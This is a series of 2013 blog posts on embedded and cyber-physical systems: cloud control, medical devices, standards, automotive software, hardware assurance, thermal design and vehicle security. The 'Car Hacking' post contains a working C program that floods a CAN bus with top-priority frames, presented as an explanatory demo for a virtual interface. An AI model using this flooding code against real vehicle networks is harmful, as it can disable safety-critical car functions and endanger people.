Thursday, December 26, 2013

Embedded Systems Channel on YouTube

I have started to record videos for my book Computers as Components. You can find them on my new YouTube channel.  Click on this link or search for "Marilyn Wolf embedded" to get there.  The videos make use of the PowerPoint slides you can find on the book Web site, but they are arranged into short, 5-10 minute chunks that each focus on one or two topics. I have put together playlists to organize the videos by topic. I will need a few months to fill out the videos for the entire book, so stay tuned!

Thursday, December 19, 2013

Credit Card Swiper Attack

News sources, including CNN's story here, are reporting that a vast amount of credit card data has been stolen from Target's customers. It appears that the card swipers were hacked to grab data from the customers' cards.

Monday, December 16, 2013

Big Signals

Big Data is a popular buzzword in computer science and with good reason.  The analysis of large data sets is both a difficult problem and one with a wide range of applications; the selection of ads for blogs based on their content and the user's activity is just one example.

But traditional Big Data systems, like Google Cloud, are designed for traditional database applications.  They aren't built to handle time-oriented data.  Cyber-physical systems, in contrast, treat time as a fundamental concept; time-series data and signals are two names for the data they produce.

Of course, entire fields (signal processing, most obviously) have sprung up to develop the mathematics of signals.  But the design of large computing systems that can efficiently handle time-series data has lagged behind.

That's where Big Signals comes in.  We need cloud computing systems that are designed to manage signals and time-series data.  We process signals differently than we process, for example, sales transactions. Cloud systems that operate on signal-oriented data will want to process small windows of signals in real time to identify important events; they will also want to analyze historical data at multiple time scales in order to identify larger trends.
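
To make the real-time half of that concrete, here is a minimal sketch in C of the kind of small-window processing a signal-oriented cloud node might run: a ring buffer holds the most recent samples, and an event fires when the short-term mean jumps well above a long-term running average.  The window size, thresholds, and synthetic input are all invented for illustration, not drawn from any real deployment.

```c
#include <stdio.h>
#include <math.h>

#define WIN 8  /* short real-time window, in samples */

int main(void) {
    double window[WIN] = {0};
    double long_term = 0.0;      /* exponentially weighted history */
    const double alpha = 0.01;   /* history decay rate */
    const double threshold = 2.0;

    for (int t = 0; t < 200; t++) {
        /* Synthetic signal: quiet, with a burst around t = 120. */
        double sample = (t > 120 && t < 140) ? 5.0 : sin(0.1 * t);

        window[t % WIN] = sample;
        double mean = 0.0;
        for (int i = 0; i < WIN; i++)
            mean += window[i];
        mean /= WIN;

        long_term = alpha * sample + (1.0 - alpha) * long_term;

        if (mean - long_term > threshold)
            printf("event at t=%d: window mean %.2f vs history %.2f\n",
                   t, mean, long_term);
    }
    return 0;
}
```

The historical, multi-time-scale analysis would run the same kind of comparison over minutes, days, and seasons rather than over a handful of samples.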

Here are a few examples of how to use Big Signals in the cloud.  Farmers may use historical weather data to figure out how to plant, water, and feed their crops.  Medical teams may use cloud-based systems both to monitor a patient's current state and to run longer-term analyses for diagnosis. Energy systems may use historical load data to manage energy generation; they can also use historical weather data to predict the generation capacity available from wind and solar.

The existing cloud computing systems are a good start, but we need to work through data schemas, access scheduling, and other problems to handle the challenges of Big Signals.

Sunday, December 15, 2013

CPS in the Clouds

Cloud computing for cyber-physical systems is in vogue; see, for example, this NSF-sponsored workshop on the topic. The idea behind cloud CPS is much the same as for information technology---move some important operations to remote server farms.  This idea leverages both efficient servers and ubiquitous Internet.

However, the technical challenges behind cloud CPS are different from and arguably harder than those for database-oriented operations.  Control systems have deadlines.  If your control system is in the clouds, then each control sample has to complete a round trip: through the Internet to the cloud server, computation in the cloud, then back through the Internet to the physical plant. The basic physics of communication mean that we won't be able to put very high-rate, low-latency control loops in the cloud.  Bandwidth isn't the only requirement---latency is ultimately limited by the speed of light.  But there are a lot of control loops that are slow enough to be put in the clouds.  Many hierarchical control systems combine some very fast control loops with supervisory control that runs much more slowly. My favorite example is traffic control.  The decisions required to time the lights could be performed in the cloud; rather than have each city buy and maintain its own traffic flow system, all cities could share a more sophisticated control system located in the cloud.
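
A back-of-the-envelope calculation shows where the ceiling sits.  The numbers below---a 1,500 km path to the server farm and 10 ms of server-side compute---are assumptions for illustration only:

```c
#include <stdio.h>

/* Estimate the fastest control loop a cloud round trip can support.
 * All numbers are illustrative assumptions. */
int main(void) {
    const double distance_km = 1500.0;   /* plant to server farm */
    const double c_km_per_s = 200000.0;  /* light in fiber, ~2/3 of c */
    const double compute_s = 0.010;      /* server-side computation */

    double rtt = 2.0 * distance_km / c_km_per_s; /* propagation only */
    double loop = rtt + compute_s;

    printf("round-trip propagation: %.1f ms\n", rtt * 1000.0);
    printf("max control rate: ~%.0f Hz\n", 1.0 / loop);
    return 0;
}
```

That works out to roughly a 40 Hz ceiling---hopeless for spark timing, but ample for supervisory decisions like traffic-light schedules.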

People often assume that cost savings is the primary motivation for putting cyber-physical systems in the cloud.  In fact, reliability is an even greater motivation.  Designing a highly-available server farm is a challenging task.  A typical large server farm consumes the electricity of a city of 50,000 people, but it crams all that energy into a space the size of a large conference room.  All the heat that is generated by those computers makes for a very challenging heat transfer problem.  Not only does the heat cost money to eliminate with cooling systems, it's a major source of failures as components overheat.


If you run a safety-critical, high-reliability cyber-physical system, you should seriously think about putting your SCADA (supervisory control) system in the cloud, preferably run by someone who does it full time.  The challenge of running a highly-reliable server system is big enough that it shouldn't be left to amateurs.

Saturday, December 7, 2013

Medical Cyber-Physical Systems

We have had medical electronic devices for several decades, and they have made a huge difference in medical care.  A nurse once explained to me how he used to set up a drip for a patient.  It required a lot of manual tweaking of the tubes and drip rate.  And this was in the 1970s, not so long ago.  Continuous monitoring instruments have also made a huge difference in patient care.

We are in the midst of a new round of medical device innovation.  This time, innovation emphasizes systems.  Networked devices have existed for a while but largely with proprietary interfaces.  The push to digitize and integrate medical records into a unified system is leading manufacturers toward an increasingly cyber-physical approach to medical device design.

Several proposals have been developed for the integration of medical devices, including MDPnP, the Medical Device Coordination Framework, and the University of Pennsylvania Medical Application Platform (MAP) architecture.  Several common themes emerge from these efforts: frameworks that support closed-loop design; safety of system operation even when individual devices fail; and the need to provide quality-of-service (QoS) guarantees for real-time data.

Patient records have become much more integrated and accessible to a broader range of medical personnel.  A decade ago, a lot of hospitals moved records on paper from one part of the hospital to another---none of their data was digitized.  As doctors learn to use these integrated systems, we can expect that they will find new applications that require new capabilities.

Monday, December 2, 2013

Thoughts on Embedded Computer Vision

The embedded computer vision space seems to be heating up.  The OpenCV library has been used to develop computer vision applications on workstations and is increasingly used on embedded platforms as well.  The new OpenVX standard provides a high-level, platform-independent API for accelerated vision functions that complements OpenCV.

What markets need computer vision? Digital cameras use quite a few vision functions---for example, face detection is used for focus and exposure compensation.  Surveillance systems use computer vision to alert system operators to important events.  Cars use cameras both to analyze the scene outside the car (looking for pedestrians, following lanes, etc.) and to watch the inside of the car (driver monitoring, for example).  Gesture control systems are now commonplace in video gaming systems and are poised to move into other types of products as well.

Sunday, December 1, 2013

Big, Embedded Software

I just found this interesting article in Aviation Week on the software for the 787.  The problem they describe seems to center on requirements: the avionics software sends too many alerts.  Because this plane is much more heavily instrumented, it has a lot of data at its disposal.  I suspect that the designers didn't think to write requirements specifically about the sensitivity of the alert system: how many alerts per hour, etc.  The traditional focus in the design of such systems is on ensuring that a particular alert is generated.  But as we move to more heavily instrumented systems across the board, we need to think more systematically about what we do with all that sensor data.  We are instrumenting not just airplanes, but buildings, factories, and roadways.  The analysis tools for all these systems must balance two tasks: making sure that important alerts are delivered quickly to the appropriate authority, and ensuring that events are accurately tagged with the appropriate level of alert.  A well-known phenomenon of alert-based systems is that too many false alarms cause human operators to disregard all alerts.  We won't get people completely out of the loop for quite some time.  Even if we do manage to build totally autonomous systems, they will face the same problem of properly discriminating between important and unimportant events.
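
One way to make an "alerts per hour" requirement concrete is a token-bucket filter on each severity level.  The sketch below is a generic illustration, not anything from the 787; the rates and the critical/non-critical split are invented, and a real system would aggregate suppressed alerts rather than discard them.

```c
#include <stdio.h>

/* Token-bucket rate limiter for alerts.  Low-severity alerts are
 * dropped when the budget is spent; critical alerts always pass.
 * Rates and severities here are illustrative assumptions. */
typedef struct {
    double tokens;      /* current budget */
    double max_tokens;  /* burst capacity */
    double per_sec;     /* refill rate */
    double last;        /* time of last update */
} bucket_t;

int allow_alert(bucket_t *b, double now, int critical) {
    b->tokens += (now - b->last) * b->per_sec;
    if (b->tokens > b->max_tokens) b->tokens = b->max_tokens;
    b->last = now;
    if (critical) return 1;          /* never suppress critical alerts */
    if (b->tokens >= 1.0) { b->tokens -= 1.0; return 1; }
    return 0;                        /* suppressed: aggregate for review */
}

int main(void) {
    bucket_t b = { .tokens = 5, .max_tokens = 5, .per_sec = 0.5, .last = 0 };
    for (int i = 0; i < 20; i++) {
        double now = i * 0.2;        /* a burst of alerts, 5 per second */
        printf("t=%.1f alert %s\n", now,
               allow_alert(&b, now, 0) ? "raised" : "suppressed");
    }
    return 0;
}
```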

Saturday, November 16, 2013

Standards for Embedded Computing Design

Here is a list of standards for embedded computing system design.  I will continue to add to this list.

  • AUTOSAR: operating system and software configuration.
  • MISRA C: coding standards for C in automotive systems.
  • ISO 26262: safety for automotive E/E.
  • NIST 7628: smart grid security.
  • SAE AS5553A: hardware authentication.
  • ARINC: standards for airplane design: 400 series for basic wiring; 500 series for analog instruments; 600 series for digital communications; 700 series for digital instruments; 800 series for networked aircraft.
  • ASTM F2761: Standard for the Integrated Clinical Environment (ICE) for networked medical devices.
  • DO-178C:  Standard for the certification of software in avionics.

Tuesday, November 12, 2013

Automotive Software

Toyota just settled a big case relating to unintended acceleration in its cars.  Here are two interesting blog posts with some details as well as the authors' opinions:

http://www.safetyresearch.net/2013/11/07/toyota-unintended-acceleration-and-the-big-bowl-of-spaghetti-code/


http://criticaluncertainties.com/2013/11/11/toyota-and-the-sphagetti-monster/

My big-picture observation on this situation is that design methodology matters.  A bad design process is bound to produce poor designs.  And as the saying goes, you have to bake safety in; you can't bolt it on.  No amount of checking can make a bad design safe.

Thursday, November 7, 2013

NIST Smart Grid Cybersecurity Guidelines

NIST has released a draft set of guidelines for smart grid cybersecurity, which you can find here.  It's a big, three-volume document, and I have just started to read it.

Volume 1 concentrates on development, architecture, and high-level requirements.  It first presents a logical architecture of the smart grid and its major components, at least for the 1-3 year time frame; based on that architecture, it identifies 22 logical interface categories.  It then specifies security requirements for each of the 22 interface categories and goes on to describe cryptographic and key management issues.

Volume 2 concentrates on privacy.  Privacy is a key issue because the information that the smart grid uses to optimize energy usage can also divulge other properties that a customer or energy provider may not want to provide: how they use their facilities, when they are home, etc.

Volume 3 provides some additional analyses.  It talks about classes of vulnerabilities, provides a bottom-up security analysis of the smart grid, and identifies research and development themes for smart grid cybersecurity.  It also provides use cases for the power system relevant to security requirements.

Thursday, October 31, 2013

GridSTAR Opening

I just returned from the grand opening of the GridSTAR center at the Philadelphia Navy Yard. This center was created by Penn State and the Department of Energy as a combined education and research center for smart energy grids.  Their first demonstration is this model home.  It both demonstrates a number of smart grid technologies and provides a training center where people can develop the skills required to work on these new systems.  The smart home includes three buildings.  The house itself demonstrates systems ranging from solar panels to radiant heat.  The learning center in back has a number of electrical systems installed inside that can be used for training.  The third building contains an energy storage system that is hooked into the Navy Yard grid.

They also showed cool systems like this solar-powered electric car charger and this electric motorcycle.

Over the longer term, GridSTAR will use the entire Navy Yard as a testbed for smart energy technologies.  Given the wide range of businesses there, from a major shipbuilder to the headquarters of Urban Outfitters, the Navy Yard should be a great place to develop new smart energy grid solutions.

Thursday, October 24, 2013

Farewell, Cyber-Physical Sewing Machine!


I am retiring one of my cyber-physical machines---my sewing machine, to be precise.  You can see the source of the problem in the photo, namely the ribbon cable to the front panel.  The front panel is attached to the body with a very small tongue and a little adhesive.  When it comes loose, it pulls the cable out of its connector.  This little four-bit microcontroller costs $120 to replace; I know because it has happened before.

I have replaced it with an old-fashioned mechanical sewing machine, one built by Toyota, no less.  It has metal gears and no computer.  Toyota, of course, has had its own problems with cyber-physical systems, but I am confident that they know how to make a reliable gearbox.

While we are on the subject of sewing machines, let's take a minute to consider the genius of the sewing machine and its inventor, Elias Howe. The mechanism of the sewing machine goes through a fiendishly complicated motion to accomplish what seems to be impossible---it wraps one thread around another.  Since Mr. Howe worked before the midpoint of the 19th century, he had no computers to control his machine.  He relied on simple rotating machinery and cleverness.  150 years later, we still use his work.  As we design complex cyber-physical machines, let's remember that our goal should be to create designs that last.

Sunday, October 20, 2013

Car Electronics: E/E

I've found a term I hadn't heard before: E/E.  It refers to the electrical/electronic architecture of a car.  Automotive has never had a term like avionics for airplanes, so this term is overdue and welcome.

One of the elements of E/E that has been around for a while now is AUTOSAR (AUTomotive Open System ARchitecture).  It is a standard that concentrates on electronic control units (ECUs). The OSEK OS, an ISO standard (ISO 17356-3), is the foundation for the specification of the operating system; it specifies the interfaces to the task-oriented functions of the OS.  AUTOSAR also specifies a Runtime Environment (RTE) that provides middleware functions for the applications.  A Microcontroller Abstraction Layer (MCAL) abstracts the microcontroller's hardware to provide a standard interface for functions such as I/O and flash.  AUTOSAR also includes a methodology for configuring an AUTOSAR-compliant system from its components.
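
As a rough illustration of that layering, here is a mock-up in C.  The layer names follow AUTOSAR naming conventions (Dio_WriteChannel is an MCAL API, and Rte_Write_* is how generated RTE write functions are named), but the function bodies, the channel number, and the headlight example are stand-ins; in a real system the MCAL and RTE code are generated from the configuration and the exact signatures come from the AUTOSAR specifications.

```c
#include <stdio.h>
#include <stdint.h>

/* --- MCAL layer: hardware access (stubbed for illustration) --- */
typedef uint8_t Dio_ChannelType;
typedef uint8_t Dio_LevelType;

void Dio_WriteChannel(Dio_ChannelType ch, Dio_LevelType level) {
    /* A real MCAL writes a microcontroller port register here. */
    printf("DIO channel %u <- %u\n", ch, level);
}

/* --- RTE layer: generated middleware between components --- */
void Rte_Write_HeadlightSwitch(Dio_LevelType on) {
    Dio_WriteChannel(/* configured channel */ 3, on);
}

/* --- Application software component: a periodic runnable --- */
void HeadlightControl_10ms(void) {
    Dio_LevelType lights_on = 1;  /* decided by application logic */
    Rte_Write_HeadlightSwitch(lights_on);
}

int main(void) {   /* stand-in for the OS invoking the runnable */
    HeadlightControl_10ms();
    return 0;
}
```

The point of the layering is that the application component never touches hardware directly, so it can be moved between ECUs by regenerating the RTE and MCAL configuration.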

Sunday, October 13, 2013

Hardware Assurance

The term hardware assurance has been circulating for the past couple of years.  This term refers to assurance that the hardware you have is the hardware you think you paid for.  Counterfeit electronic hardware has become a big problem for the military---they pay big money for equipment that turns out to be fraudulent and non-functional.  Companies are increasingly concerned about the effects of counterfeit hardware on their bottom line---not only do they lose the sale to the counterfeit, but they often have to pick up the warranty costs for those counterfeits, too.

At the most basic level, hardware assurance ensures that components have not been substituted.  One way to provide such assurance is through supply chain management: auditing, custody chain tracking, etc. SAE has developed a standard, AS5553A, for the documentation and procedures to be followed to ensure a reliable supply of components from suppliers.  That standard, of course, needs to be followed not just by your supplier but by their suppliers as well.

Programmable memories are, of course, an easy way to attack programmable devices.  Andrew Appel of Princeton University has demonstrated the ease with which ROMs on New Jersey's voting machines can be substituted, allowing the voting machine to be reprogrammed.

A more subtle version of this problem rears its head in the semiconductor world.  If you give a set of masks to a semiconductor manufacturer, how do you know that they manufactured the circuit you gave them?  Not only may they have manufactured junk, but they may have introduced Trojan horses into your hardware that they can exploit at a later date.  Various techniques have been developed to deal with this problem.  Netlists can be used as watermarks to verify that the design has not been changed.

Yet another subtlety comes into play for embedded devices---how do you know that a device in the field hasn't been swapped?  Even if a device leaves your plant with the correct hardware, it may have been compromised after installation. Physically unclonable functions (PUFs) can be used to generate a unique signature for each device that can be checked in the field.
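
A sketch of how a PUF check might work in the field: at manufacture, record the device's responses to a set of challenges; later, re-issue a challenge and accept the device only if the response is within a small Hamming distance of the enrolled one, since PUF responses are slightly noisy.  The puf_response() function below is a stand-in for the real hardware primitive, and the tolerance is an invented number.

```c
#include <stdio.h>
#include <stdint.h>

/* Stand-in for the hardware PUF: a real PUF derives its response
 * from uncontrollable manufacturing variation and is noisy. */
uint32_t puf_response(uint32_t challenge) {
    return (challenge * 2654435761u) ^ 0xA5A5A5A5u;  /* fake */
}

int hamming(uint32_t a, uint32_t b) {
    int d = 0;
    for (uint32_t x = a ^ b; x; x >>= 1) d += x & 1;
    return d;
}

int main(void) {
    uint32_t challenge = 0xDEADBEEF;
    uint32_t enrolled = puf_response(challenge); /* stored at factory */

    /* In the field: same challenge, tolerate a few noisy bits. */
    uint32_t reply = puf_response(challenge) ^ 0x3u; /* 2 bit flips */
    int ok = hamming(reply, enrolled) <= 4;

    printf("device %s\n", ok ? "authentic" : "suspect");
    return 0;
}
```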

Sunday, October 6, 2013

Thermal-Aware Computing

Temperature has reared its head as an important issue.  And it's not just a challenge for server farms.  All types of embedded devices must be designed to meet thermal-related design specifications.

Thermal behavior affects system operation in several ways.  Heat generation causes problems for the environment in which the device operates.  In machine rooms, we want to pack as many CPUs and disk drives into the room as possible; perhaps even more important, we don't want to spend any more money than we have to on cooling the room.  Thus, the simple quantity of energy transferred into the room from the processors is a big issue in machine rooms.  Machine room designers also have to worry about how air circulates.  Poor air circulation leads to hot spots that cause devices to fail.

Excess temperatures also lead to catastrophic component failure.  And I don't use the word catastrophic lightly.  Search for "overheating Pentium" on YouTube to find a variety of videos that show CPUs running so hot that they start to smoke.  These failures are so catastrophic because they are the result of positive feedback: high temperatures increase leakage currents; high leakage currents increase temperature.

In consumer electronics, the traditional goal for temperature management has been to avoid fans. A fan, even a well-designed one, creates some amount of background noise that is particularly undesirable in multimedia applications.  Of course, a fan on a cell phone is just plain ridiculous.  Today's cell phones can get pretty darn warm to the touch if you run a data-intensive application for a few minutes.

But temperature has a more subtle effect on system lifetime.  A CPU doesn't have to catch fire to be damaged.  Chips can fail in all sorts of ways: dopants rediffuse, oxides break down, wires fail.  Most of these failure mechanisms are temperature-dependent, often exponentially so.  The hotter you run, the shorter your lifetime. Even running just under the maximum temperature for your device doesn't avoid trouble.
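
The standard way reliability engineers quantify that exponential dependence is the Arrhenius model: the aging acceleration between two temperatures is exp((Ea/k)(1/T1 - 1/T2)).  The activation energy below, 0.7 eV, is a typical textbook value, not specific to any device or failure mechanism.

```c
#include <stdio.h>
#include <math.h>

/* Arrhenius acceleration factor between two junction temperatures. */
int main(void) {
    const double k = 8.617e-5;       /* Boltzmann constant, eV/K */
    const double Ea = 0.7;           /* activation energy, eV (typical) */
    const double T1 = 273.15 + 55.0; /* 55 C junction, in kelvin */
    const double T2 = 273.15 + 85.0; /* 85 C junction */

    double af = exp((Ea / k) * (1.0 / T1 - 1.0 / T2));
    printf("running at 85 C ages the chip %.1fx faster than 55 C\n", af);
    return 0;
}
```

With those numbers a 30-degree bump costs roughly a factor of eight in lifetime, which is why "it hasn't caught fire" is not the right thermal spec.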

Tuesday, October 1, 2013

Embedded Systems Week: Mixed-Criticality and Model-Based Design

Today at Embedded Systems Week, I attended the special session on mixed-criticality systems.  This is a relatively new formulation of real-time systems in which tasks are grouped into levels of criticality.  Tasks in the higher levels of criticality are given priority over lower-criticality tasks when resource constraints arise. As we put more and more functions into systems, we need to understand how to manage criticality.  Imagine, for instance, the electronic systems in your car.  The engine controller and radio both run on the same computing platform, but we want to be sure that the engine controller is viewed by the system as more critical than the radio.  The panelists did a good job of explaining the importance of the problem, what progress we have made on mixed-criticality in a few short years, and what we still need to do.
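
A toy version of the core idea, loosely in the spirit of Vestal-style mixed-criticality scheduling: every task carries a criticality level, and when a high-criticality task overruns its optimistic budget the system switches modes and sheds the low-criticality work.  The task names, budgets, and observed execution time below are all invented for illustration.

```c
#include <stdio.h>

/* Toy mixed-criticality mode switch: in HI mode, only tasks at
 * HI criticality keep running. */
enum crit { LO, HI };

struct task {
    const char *name;
    enum crit level;
    double budget_ms;  /* optimistic (LO-mode) execution budget */
};

int main(void) {
    struct task tasks[] = {
        { "engine_ctrl", HI, 2.0 },
        { "radio_ui",    LO, 5.0 },
        { "logging",     LO, 1.0 },
    };
    enum crit mode = LO;
    double engine_exec_ms = 2.7;  /* observed overrun this frame */

    if (engine_exec_ms > tasks[0].budget_ms)
        mode = HI;                /* overrun: protect critical work */

    for (int i = 0; i < 3; i++) {
        if (mode == HI && tasks[i].level == LO)
            printf("%s: shed\n", tasks[i].name);
        else
            printf("%s: run\n", tasks[i].name);
    }
    return 0;
}
```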

I also attended the special session on model-based design.  The panel considered efforts to take the next step from models as documents and tools to models as the only artifacts used for complex system design.  The panelists walked us through an example model-based design, including verifying a simple specification.  They also talked about the complexities of using models for real-world systems.  Given the huge number of different modeling languages in use, each with its own advantages, it is unlikely that we will ever have a single, unified modeling language for all systems.  The panelists instead advocated using a collection of application-specific languages tied together with tools that cross-check properties of the individual models.

Embedded Systems Week: Systems Engineering and Run-Time Adaptation

Monday's keynote at Embedded Systems Week came from Clas Jacobson, Chief Scientist at United Technologies Systems and Controls Engineering.  UTC designs a lot of complex cyber-physical systems, including elevators, car subsystems, and jet engines.  Dr. Jacobson identified three As as important in CPS design: architecture, abstractions, and automation.  He stressed the importance of good modeling as the foundation of robust system design.

I also attended a session on run-time adaptation with presentations by Joerg Henkel, Vijay Narayanan, Sri Parameswaran, and Juergen Teich.  Determining all aspects of system operation at design time simply doesn't work for today's complex systems.  The computation required depends on the input data---image/video compression is a classic example of a complex relationship between the data and compression time.  The complexities of thermal management are also best handled in many cases by run-time systems.  The talks gave a multi-level view of the problem.  Joerg's talk concentrated on thermal management, including a cool infrared video of chip temperature over time.  Vijay's talk looked at the opportunities presented by tunneling transistors, which provide good off characteristics but are slower than traditional MOSFETs.  Sri's talk looked at video compression and how to manage the complex pipeline required to perform all the steps of compression.  Juergen's talk described a new model of computation for run-time management known as invasive computing.

Sunday, September 29, 2013

Embedded Systems Week: Security Workshop

I'm at Embedded Systems Week, the major research conference for embedded computing.  Today, I attended the Embedded Systems Security Workshop.  The speakers presented some very interesting results.  But let me concentrate on the keynote by Wayne Burleson of the University of Massachusetts, who spoke on privacy in embedded computing.

He made the very interesting point that trust and security are not the same thing; we don't understand as much about trust as we do about security.  We have identified quite a few threat models in traditional computer security.  The same cannot be said for privacy.  It isn't always clear from whom the threat comes or what constitutes an invasion of privacy.  Some releases of personal information are natural, intended, and necessary; some breaches are unnecessary but not particularly consequential; others can have devastating consequences.  Unfortunately, if we don't understand the threat models, we can't do much to mitigate those threats.

He described two of his projects.  The first developed new techniques for electronic fare payment for transportation systems.  He and his colleagues developed a form of electronic cash that allows the user to pay for a fare and obtain special fares such as senior citizen fares without disclosing other information about themselves.

He then talked about his work on medical system privacy.  The medical community is busy developing all sorts of implanted medical devices that can transmit information about the state of your body to your doctor.  The trick is to be sure that only the intended people have access to that information.  Medical devices operate under severe energy constraints, on the order of 10 joules per operation, so any security and privacy techniques employed in the device must work within these very low energy budgets.  Burleson also pointed out that the risk/benefit analysis of medical devices must be carefully performed.  For example, hacks on pacemakers were revealed a few years ago.  The manufacturers very quickly addressed the problems because of concerns that patients would decide not to have a pacemaker in order to avoid being hacked.  Of course, the risk of dying from lack of a pacemaker is much, much higher than the risk of having your pacemaker hacked, but there is no point in taking chances with such an analysis.

Wednesday, September 11, 2013

Car Hacking

The common conception of security problems in cars is theft---someone breaks into your car electronically and drives away with it. The security challenges created by the computers that control your car go far beyond that scenario.  Modern cars are cyber-physical systems with dozens of computers that control safety-critical functions.  All sorts of security problems can cause cars to fail catastrophically---that is, crash.

One important category of vulnerabilities in cars is timing.  If someone messes up the timing of the firing of the spark plugs and fuel injectors in your engine, the engine stops working.  Timing problems in the braking system can cause you to lose control of steering.

How do timing problems occur?  Some of the scenarios are localized.  The engine control unit (ECU) is in charge of sending out all the signals to control the engine.  Problems in the ECU software can cause it to improperly time some of the signals to the engine.  The effects can range from running rough to total engine failure.

But the computers in your car are connected together on a network.  Just as the Internet created new types of security problems for home and business computers, car networks create new vulnerabilities for cars.  Units in the car communicate with each other over the network in real time to coordinate their activities.  Interfere with their ability to communicate and the car itself stops working properly.

The CAN bus has been used in cars for years.  Unfortunately, it is vulnerable to all sorts of timing problems.  For example, one component on the CAN bus can jam the network by sending out too many messages.  The simplicity of the CAN bus means that there is no global control that can monitor and react to these sorts of problems.
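
To see why this is so easy, remember that CAN arbitration always lets the lowest message ID win.  On Linux you can watch the effect with the kernel's SocketCAN interface; the sketch below floods a virtual bus with highest-priority frames, which on a real bus would starve every other node.  Run it only against a virtual vcan0 interface, never real vehicle hardware.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <net/if.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/can.h>
#include <linux/can/raw.h>

/* Flood a (virtual!) CAN bus with ID 0x000 frames.  ID 0x000 wins
 * every arbitration round, so this starves all other traffic.
 * Set up the interface first:
 *   ip link add dev vcan0 type vcan && ip link set up vcan0 */
int main(void) {
    int s = socket(PF_CAN, SOCK_RAW, CAN_RAW);

    struct ifreq ifr;
    strcpy(ifr.ifr_name, "vcan0");
    ioctl(s, SIOCGIFINDEX, &ifr);

    struct sockaddr_can addr = {0};
    addr.can_family = AF_CAN;
    addr.can_ifindex = ifr.ifr_ifindex;
    bind(s, (struct sockaddr *)&addr, sizeof(addr));

    struct can_frame frame = {0};
    frame.can_id = 0x000;   /* highest-priority identifier */
    frame.can_dlc = 8;      /* 8 data bytes; contents irrelevant */

    for (;;)
        write(s, &frame, sizeof(frame));  /* saturate the bus */
    return 0;
}
```

Nothing in the protocol stops a compromised node from doing exactly this, which is the point: CAN has no global policeman.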

The FlexRay bus was designed to avoid many of these problems, and it's starting to appear in cars.  FlexRay has some very sophisticated mechanisms, including a time-triggered schedule.  Time will tell how well they solve old problems and whether they create new challenges.

Sunday, September 8, 2013

The Maker Revolution and the Embedded World

The Maker movement has reinvigorated my faith in humanity.  I had become increasingly worried that people---both kids and adults---had stopped making things. So many traditional hobbies---model airplanes, plastic models, ham radio---have shriveled.  Working on cars used to be an American passion; John Steinbeck included an ode to the mechanic as a chapter in The Grapes of Wrath. Today, cars are designed so that amateur car maintenance is very difficult.

Today, we have turned the corner and see people building all sorts of new things in all sorts of ways.  A few key product innovations have helped enable this revolution. Lego Mindstorms certainly introduced a lot of kids to robotics.  3D printers, which were exotic and expensive just a few years ago, have been democratized to the point of becoming household items.

But I am a little surprised that we don't see more integration of the mechanical and computer sides of Makerdom. Sure, we see computers controlling things, but that control is very, very simple.  Concurrency is fundamental to embedded computing.  Computers allow our machines to do several things at once.  But most of the toys I see do one thing at a time, roughly speaking.  Robots perform one operation, then stop and do something else.

Concurrency is, of course, not easy to achieve.  But it is cool.  I hope that we can figure out ways to make concurrency simpler and usable by hobbyists.  That will require new programming models that make it easy to describe concurrency.  We've made some progress on that front for high-end system designers, but those high-level programming languages are too complex for hobbyists.  I suspect that a hobbyist-friendly concurrent embedded programming language would be useful not just for high school kids but ultimately for a wide range of professional system designers.
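
What might hobbyist-friendly concurrency look like?  Even without a new language, a pattern as simple as the cooperative loop below lets a machine blink a light and poll a sensor "at the same time" without any task blocking the others.  This is only a sketch; the task periods are invented and the printf calls stand in for real hardware actions.

```c
#include <stdio.h>
#include <time.h>

/* Minimal cooperative scheduler: each task runs when its period
 * elapses and must return quickly instead of blocking. */
typedef struct {
    void (*run)(void);
    long period_ms;
    long next_ms;
} task_t;

long now_ms(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return ts.tv_sec * 1000L + ts.tv_nsec / 1000000L;
}

void blink(void)  { printf("blink LED\n"); }
void sensor(void) { printf("read sensor\n"); }

int main(void) {
    task_t tasks[] = { { blink, 500, 0 }, { sensor, 200, 0 } };
    for (;;) {                       /* both tasks "run at once" */
        long t = now_ms();
        for (int i = 0; i < 2; i++) {
            if (t >= tasks[i].next_ms) {
                tasks[i].run();
                tasks[i].next_ms = t + tasks[i].period_ms;
            }
        }
    }
    return 0;
}
```

The trick a friendlier language would add is letting a beginner write each task as straight-line code while the system handles the interleaving.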

Tuesday, September 3, 2013

Toilet Hacking

The press recently caught on to the fact that real-world objects, not just computers, can be hacked.  This CNN story on the hacking demonstrations at Def Con and Black Hat, such as hacking a fancy Japanese toilet, is one example, but there are others.  Of course, your toilet can't be hacked if it doesn't have a computer in it.  I've used those fancy Japanese toilets and I find them a little scary, so I'm glad that I don't have one at home.  But this sort of hacking has been a hidden problem for a long time, and I am glad that it is coming out into the open.


A lot of the recent stories have been about objects that I would call Internet of Things simply because they perform common functions but are also clearly connected to the Internet.  But a lot of things we don't think about in our daily lives are also connected to the Internet.  Many of us don't have a traditional phone line (what the Bell System used to call POTS, or Plain Old Telephone Service); we instead rely on telephones that are built on top of the Internet.  Quite a few industrial systems are now connected to the Internet.  These network connections provide useful functions but they also open up serious vulnerabilities. 

So long as we understand the security implications of those systems and take care of them properly, things will continue to run along smoothly.  But with great power comes great responsibility, and as the Internet of Things grows we need to be sure to manage it responsibly.  If we don't, all those devices could start to bite us on the fanny.